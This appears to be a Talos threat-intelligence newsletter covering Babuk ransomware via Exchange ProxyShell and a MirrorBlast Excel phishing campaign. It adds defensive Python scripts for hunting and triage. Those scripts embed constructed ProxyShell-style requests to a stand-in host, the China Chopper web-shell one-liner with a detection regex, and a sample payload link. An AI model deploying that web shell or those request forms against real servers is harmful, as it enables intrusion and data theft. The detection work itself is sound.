Good afternoon, Talos readers.

A series of vulnerabilities in Microsoft Exchange Server made waves earlier this year when they came under active attack. They have since faded from the headlines, but attackers are still very much paying attention.

Attackers spreading the Babuk ransomware are exploiting these vulnerabilities to infect victims. Find out exactly how these Babuk attacks work, and if you haven't already, patch.

To prepare for a ransomware attack like this, it's always important to have an incident response plan at the ready. Whether you are looking to create an IR plan from scratch, or just looking to polish your current one, we have a new guide to get you started.

Cybersecurity week in review

  • At least one member of the BlackMatter ransomware gang started using a custom data exfiltration toolkit to steal specific file types and upload them to an attacker-controlled server. Security researchers have found multiple variants of the tool, suggesting the attackers have refined the tool to expedite the exfiltration of high volumes of data.
  • Google's new Pixel 6 phone contains several new security features, headlined by an in-house system-on-chip that powers the device. The company has also promised to provide security updates to the Pixel 6 for at least five years.
  • A since-patched bug in the health app Docket exposed the vaccination status and other information of users in New Jersey and Utah. The app is officially endorsed in those states as a way to present the user's proof of vaccination.
  • Europol arrested several people involved with the LockerGoga ransomware and took down the malware's operations. It's estimated that LockerGoga infected more than 1,800 victims across 71 countries.
  • Ransomware attacks have already hit nearly 1,000 schools in the U.S. this year. The number of attacks targeting school systems rose in 2019, and since then, the pace has only accelerated.
  • The U.S. Cybersecurity and Infrastructure Security Agency has started mapping and labeling all critical infrastructure in the U.S. that, if hit with a cyber attack, could disrupt everyday life. The hope is that, by accounting for all CI, it will make it easier to pass and implement legislation in the future to secure these services.
  • Jen Easterly, the head of CISA, added during testimony to Congress that her agency is also developing a list of known exploited vulnerabilities, and will require federal agencies to patch them. While the directive will only apply to the federal public sector, she encouraged all organizations to closely follow the list.
  • Iran is publicly blaming the U.S. and Israel for cyber attacks that disrupted gasoline sales in the country for days. The outage led to higher gas prices and forced gas stations to operate manually.
  • The Grief ransomware group hit the National Rifle Association last week. This is a particularly tough situation for the gun rights advocacy group, because Grief is under U.S. government sanction, meaning the NRA itself could face penalties if it chooses to pay the extortion demand.

Notable recent security issues

Microsoft Exchange vulnerabilities exploited once again for ransomware, this time with Babuk

Cisco Talos recently discovered a malicious campaign deploying variants of the Babuk ransomware, predominantly affecting users in the U.S. with a smaller number of infections in the U.K., Germany, Ukraine, Finland, Brazil, Honduras and Thailand. The actor behind the campaign is sometimes referred to as Tortilla, based on the payload file names used in the campaign. This is a new actor, operating since July 2021. Before moving to this ransomware, Tortilla experimented with other payloads, such as Powercat, a PowerShell-based Netcat clone that attackers use to obtain remote shells on Windows machines. We assess with moderate confidence that the initial infection vector is exploitation of the ProxyShell vulnerabilities in Microsoft Exchange Server, followed by deployment of the China Chopper web shell.

Snort SIDs: 57873, 57874

ClamAV signatures:

  • Win.Ransomware.Packer-7473772-1
  • Win.Trojan.Swrort-5710536-0
  • Win.Trojan.Powercat-9840812-0
  • Win.Trojan.Swrort-9902494-0
  • Win.Exploit.PetitPotam-9902441-0
  • Win.Trojan.MSILAgent-9904224-0
  • Win.Malware.Agent-9904986-0
  • Win.Malware.Agent-9904987-0
  • Win.Malware.Agent-9904988-0
  • Win.Malware.Agent-9904989-0
  • Win.Malware.Agent-9904990-0
  • Win.Downloader.DarkTortilla-9904993-0
  • Win.Trojan.DarkTortilla-9904994-0
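The chain described above, ProxyShell exploitation against the Exchange Autodiscover front end followed by a China Chopper web shell, leaves traces in IIS logs and on disk. The following Python script is an added example, not Talos tooling and not the Snort or ClamAV signatures listed above: it parses IIS W3C log rows (a constructed sample is embedded), flags autodiscover.json requests whose query begins with "@" (the ProxyShell path-confusion form) and POSTs to .aspx files under /aspnet_client/, and checks an .aspx body for the classic China Chopper eval(Request.Item[...], "unsafe") one-liner. The drop-directory list, backend path list and regexes are heuristics assumed for this example, and the sample log and shell body are constructed, not real captures.

```python
"""Hunt for ProxyShell-style requests and China Chopper-style ASPX shells.

Added example, not Talos tooling. The IIS log lines and the ASPX body below
are constructed samples; the path lists and regexes are heuristics assumed
for this example, not Talos's or Microsoft's detection logic.
"""
import re

# Constructed sample of an IIS W3C log (not a real capture). parse_iis() is
# driven by the #Fields header, so a real log with more columns also works.
SAMPLE_IIS_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-10-01 10:00:01 GET /owa/auth/logon.aspx url=https://mail.example.test/owa/ 10.0.0.5 200
2021-10-01 10:00:07 POST /autodiscover/autodiscover.json @evil.test/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.test 198.51.100.7 200
2021-10-01 10:00:09 POST /autodiscover/autodiscover.json @evil.test/powershell/?&Email=autodiscover/autodiscover.json%3F@evil.test 198.51.100.7 200
2021-10-01 10:00:30 POST /aspnet_client/system_web/error.aspx - 198.51.100.7 200
2021-10-01 10:01:00 GET /ecp/default.aspx - 10.0.0.5 200
"""

# Heuristics (assumptions for this example): ProxyShell's path-confusion
# stage is a request to autodiscover.json whose query begins with '@' and
# names a backend path such as /powershell or /mapi/nspi; web shells are
# commonly dropped as .aspx files under /aspnet_client/.
AUTODISCOVER_STEM = re.compile(r"/autodiscover/autodiscover\.json$", re.I)
BACKEND_PATHS = ("/powershell", "/mapi/nspi")
WEBSHELL_DROP_DIRS = ("/aspnet_client/",)
# Classic China Chopper ASPX body:
#   <%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>
CHOPPER_ASPX = re.compile(
    r"eval\s*\(\s*Request\.Item\s*[\[(]\s*[\"'][^\"']+[\"']\s*[\])]\s*,\s*[\"']unsafe[\"']",
    re.I,
)


def parse_iis(text):
    """Yield one dict per data row, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed row; skip rather than misalign columns
        yield dict(zip(fields, parts))


def hunt_iis(text):
    """Return a list of findings (dicts) from IIS log text."""
    findings = []
    for row in parse_iis(text):
        stem, query = row["cs-uri-stem"], row["cs-uri-query"]
        if AUTODISCOVER_STEM.search(stem) and query.startswith("@"):
            # Path confusion through the Autodiscover front end; record the
            # backend the request was steered to, if one of the known ones.
            backend = next((p for p in BACKEND_PATHS if p in query.lower()), None)
            findings.append({"rule": "proxyshell_autodiscover", "ip": row["c-ip"],
                             "uri": stem + "?" + query, "backend": backend})
        elif (row["cs-method"] == "POST" and stem.lower().endswith(".aspx")
              and any(d in stem.lower() for d in WEBSHELL_DROP_DIRS)):
            findings.append({"rule": "aspx_post_in_drop_dir", "ip": row["c-ip"],
                             "uri": stem, "backend": None})
    return findings


def is_chopper_aspx(body):
    """True if an .aspx body matches the China Chopper eval(Request.Item[...],"unsafe") form."""
    return bool(CHOPPER_ASPX.search(body))


if __name__ == "__main__":
    for finding in hunt_iis(SAMPLE_IIS_LOG):
        print(finding)
    # Constructed shell body in the classic China Chopper ASPX form (not a real sample).
    sample_shell = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
    print("chopper:", is_chopper_aspx(sample_shell))
```

Run as-is, the script reports the two autodiscover.json requests (one steered to /mapi/nspi, one to /powershell) and the POST to the .aspx under /aspnet_client/, and confirms the sample shell body. On a real server, feed it the front-end IIS logs, widen WEBSHELL_DROP_DIRS to the OWA and ECP directories your baseline says should never receive POSTs to newly created .aspx files, and run is_chopper_aspx over any .aspx whose creation time postdates the flagged requests.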
MirrorBlast phishing campaign uses Excel spreadsheets to evade detection

A phishing campaign that recently hit the malware landscape uses a specially crafted Excel file to put malicious URLs and files in front of victims while evading detection. The spreadsheets use social engineering to convince users to enable macros in Microsoft Office. Some infection chains deliver the Excel file through Google Drive and SharePoint links; others attach it directly to the email. The spam emails commonly center on COVID-19 news, one of the most popular lures spammers have used over the past two years.

Snort SIDs: 58430 - 58433
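Before a user ever sees the "enable macros" prompt, the attachment itself can be triaged offline: an .xlsm or .xlsx file is a zip of XML parts, and its macro containers and external link targets are visible without opening Excel. The script below is an added example, not Talos tooling and not derived from a real MirrorBlast sample; it builds a minimal workbook in memory (constructed) and reports whether the file carries a VBA project (xl/vbaProject.bin), Excel 4.0 macro sheets (xl/macrosheets/), or external hyperlink targets in its relationship parts. The part names it checks and the relationship regex are assumptions made for this example.

```python
"""Triage an Office Open XML workbook (xlsx/xlsm) for macro containers.

Added example, not Talos tooling. The workbook is constructed in memory so
the script runs offline; the part names treated as macro containers and the
relationship regex are assumptions made for this example.
"""
import io
import re
import zipfile

# Assumptions: VBA macros live in xl/vbaProject.bin; Excel 4.0 (XLM) macro
# sheets live under xl/macrosheets/; an embedded hyperlink shows up in a
# .rels part as Target="http..." with TargetMode="External".
VBA_PART = "xl/vbaProject.bin"
XLM_DIR = "xl/macrosheets/"
EXTERNAL_REL = re.compile(r'Target="(https?://[^"]+)"[^>]*TargetMode="External"', re.I)


def triage_workbook(data: bytes) -> dict:
    """Report which macro containers and external link targets a workbook carries."""
    result = {"vba": False, "xlm_sheets": [], "external_urls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        result["vba"] = VBA_PART in names
        result["xlm_sheets"] = [n for n in names if n.startswith(XLM_DIR) and n.endswith(".xml")]
        for n in names:
            if n.endswith(".rels"):
                # Relationship parts are small XML files; a regex is enough for triage.
                text = z.read(n).decode("utf-8", errors="replace")
                result["external_urls"].extend(EXTERNAL_REL.findall(text))
    return result


def verdict(info: dict) -> str:
    """Collapse the triage result into one label for a mail-gateway decision."""
    if info["vba"] or info["xlm_sheets"]:
        return "macro-bearing"
    if info["external_urls"]:
        return "links-only"
    return "clean"


def build_sample(with_macros: bool) -> bytes:
    """Constructed minimal workbook zip for the demo (not a real MirrorBlast sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        if with_macros:
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder")  # OLE magic + filler
            z.writestr("xl/macrosheets/sheet1.xml", "<macrosheet/>")
            z.writestr(
                "xl/worksheets/_rels/sheet1.xml.rels",
                '<Relationships><Relationship Id="rId1" '
                'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
                'Target="https://drive.example.test/d/payload" TargetMode="External"/>'
                "</Relationships>",
            )
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        info = triage_workbook(build_sample(flag))
        print(verdict(info), info)
```

The sample with macros comes back "macro-bearing" with one XLM sheet and the Google-Drive-style link target; the plain one comes back "clean". In practice, a document that is macro-bearing and also carries an external download target is the combination worth quarantining before a user is asked whether to enable content.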

Most prevalent malware files this week

SHA 256: 5bab2ae1cada90f37b821e4803912c5b351fda417bbf0a9c768b715c6d492e13

MD5: a6a7eb61172f8d988e47322ebf27bf6d

Typical Filename: wx.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Wingo::in07.talos

SHA 256: e5044d5ac2f8ea3090c2460a5f7d92a5a49e7fa040bf26659ec2f7c442dda762

MD5: 6ea750c9d69b7db6532d90ac0960e212

Typical Filename:

Claimed Product: N/A

Detection Name: Auto.E5044D5AC2.242358.in07.Talos

SHA 256: 8b4216a7c50599b11241876ada8ae6f07b48f1abe6590c2440004ea4db5becc9

MD5: 34560233e751b7e95f155b6f61e7419a

Typical Filename: SAntivirusService.exe

Claimed Product: A n t i v i r u s S e r v i c e

Detection Name: PUA.Win.Dropper.Segurazo::tpd

SHA 256: 7b4da67a0eea0dce93c7d89c565319fe2645114ca0ff679948ad2a55819c79b4

MD5: 990d51d0c45519da4d995f7c264733e5

Typical Filename: SAntivirusService.exe

Claimed Product: SAService

Detection Name:

SHA 256: fc8d064e05ebe37d661aeccb78f91085845e9e28ccff1f9b08fd373830e38b7f

MD5: e0a50c60a85bfbb9ecf45bff0239aaa3

Typical Filename: gMpKaUjCkJ

Claimed Product: N/A

Detection Name: WinGoRanumBot::mURLin::W32.Auto:fc8d064e05.in03.Talos

Keep up with all things Talos by following us on Twitter. Snort and ClamAV also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here and Talos Takes here (as well as on your favorite podcast app). And, if you're not already, you can subscribe to the weekly Threat Source newsletter here.